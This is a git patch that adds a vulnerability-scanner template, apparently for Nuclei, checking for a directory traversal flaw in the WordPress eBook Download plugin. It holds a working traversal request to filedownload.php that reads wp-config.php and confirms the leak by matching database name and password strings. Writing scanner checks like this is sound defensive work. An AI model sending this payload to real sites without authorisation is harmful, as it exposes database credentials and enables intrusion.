From c4186186028c4e34987b570f4ae6f97ff7585a43 Mon Sep 17 00:00:00 2001
From: idealphase <mynameisphase@gmail.com>
Date: Wed, 24 Nov 2021 19:58:55 +0700
Subject: [PATCH] Create wordpress-ebook-download-lfi.yaml

Create wordpress-ebook-download-lfi.yaml
---
 .../wordpress-ebook-download-lfi.yaml         | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml

diff --git a/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml b/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
new file mode 100644
index 0000000000..0e1fb7249d
--- /dev/null
+++ b/vulnerabilities/wordpress/wordpress-ebook-download-lfi.yaml
@@ -0,0 +1,29 @@
+id: wp-ebook-download-lfi
+
+info:
+  name: Wordpress eBook Download < 1.2 - Directory Traversal
+  author: idealphase
+  severity: high
+  description: The Wordpress eBook Download plugin was affected by a filedownload.php Local File Inclusion security vulnerability.
+  reference:
+    - https://wpscan.com/vulnerability/13d5d17a-00a8-441e-bda1-2fd2b4158a6c
+    - https://www.exploit-db.com/exploits/39575
+  tags: wordpress,wp-plugin,lfi,wordpress,ebook
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        condition: and
+
+      - type: status
+        status:
+          - 200